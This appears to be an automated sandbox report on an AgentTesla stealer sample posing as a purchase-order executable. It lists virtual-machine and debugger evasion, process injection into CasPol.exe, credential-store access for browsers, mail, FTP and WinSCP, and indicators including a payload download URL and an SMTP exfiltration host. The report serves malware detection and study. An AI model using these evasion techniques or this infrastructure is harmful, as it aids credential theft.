Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: SPORENE.exe, 00000004.00000002.214566939150.0000000004080000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: CasPol.exe, 0000000A.00000002.219005991038.0000000001290000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=5A15FDA1AE98540B&RESID=5A15FDA1AE98540B%21126&AUTHKEY=AMKTKWDFSBDEH_E
Source: SPORENE.exe, 00000004.00000002.214566939150.0000000004080000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219005991038.0000000001290000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: SPORENE.exe, 00000004.00000002.214565667753.0000000001AE3000.00000004.00000020.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1860

Thread sleep time: -2767011611056431s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window / User API: threadDelayed 9946

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Code function: 2_2_00406873 FindFirstFileW,FindClose,	2_2_00406873
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Code function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405C49
Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe	Code function: 2_2_0040290B FindFirstFileW,	2_2_0040290B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe

System information queried: ModuleInformation

Jump to behavior

Source: SPORENE.exe, 00000004.00000002.214568115742.00000000054F9000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: SPORENE.exe, 00000004.00000002.214568115742.00000000054F9000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: SPORENE.exe, 00000004.00000002.214568115742.00000000054F9000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SPORENE.exe, 00000004.00000002.214566939150.0000000004080000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: SPORENE.exe, 00000004.00000002.214568115742.00000000054F9000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: SPORENE.exe, 00000004.00000002.214568115742.00000000054F9000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 0000000A.00000002.219004779835.000000000106B000.00000004.00000020.sdmp, CasPol.exe, 0000000A.00000002.219005284552.00000000010D8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 0000000A.00000002.219005991038.0000000001290000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21126&authkey=AMKTKwdfsBDEH_E
Source: SPORENE.exe, 00000004.00000002.214566939150.0000000004080000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219005991038.0000000001290000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SPORENE.exe, 00000004.00000002.214568115742.00000000054F9000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: SPORENE.exe, 00000004.00000002.214568115742.00000000054F9000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: SPORENE.exe, 00000004.00000002.214565667753.0000000001AE3000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SPORENE.exe, 00000004.00000002.214568115742.00000000054F9000.00000004.00000001.sdmp, CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 0000000A.00000002.219007696569.0000000002CF9000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 10_2_00E46EA0 LdrInitializeThunk,

10_2_00E46EA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F00000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\SPORENE.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\SPORENE.exe

Jump to behavior

Source: CasPol.exe, 0000000A.00000002.219007283940.00000000018A1000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 0000000A.00000002.219007283940.00000000018A1000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: CasPol.exe, 0000000A.00000002.219007283940.00000000018A1000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: CasPol.exe, 0000000A.00000002.219007283940.00000000018A1000.00000002.00020000.sdmp	Binary or memory string: Program ManagerT/

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order PO20211027STK.exe

2_2_0040352D

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 528, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 528, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000A.00000002.219015661495.000000001DF51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 528, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Access Token Manipulation1	Disable or Modify Tools1	OS Credential Dumping2	Security Software Discovery421	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection112	Virtualization/Sandbox Evasion341	Credentials in Registry1	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Access Token Manipulation1	Security Account Manager	Virtualization/Sandbox Evasion341	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Application Window Discovery1	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	System Information Discovery117	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Side-Loading1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Purchase Order PO20211027STK.exe	16%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\SPORENE.exe	9%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Virustotal		Browse
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
https://api.ipify.org%4	0%	Avira URL Cloud	safe
http://smtp.construccionsjpallas.com	0%	Avira URL Cloud	safe
https://api.ipify.org%GETMozilla/5.0	0%	Avira URL Cloud	safe
http://SukKLs.com	0%	Avira URL Cloud	safe
https://bBdyMHz8DHQmQ5qFFNz.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
smtp.construccionsjpallas.com	134.0.9.148	true	true	unknown
onedrive.live.com	unknown	unknown	false	high
ervtqq.bl.files.1drv.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://onedrive.live.com/download?cid=5A15FDA1AE98540B&r	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
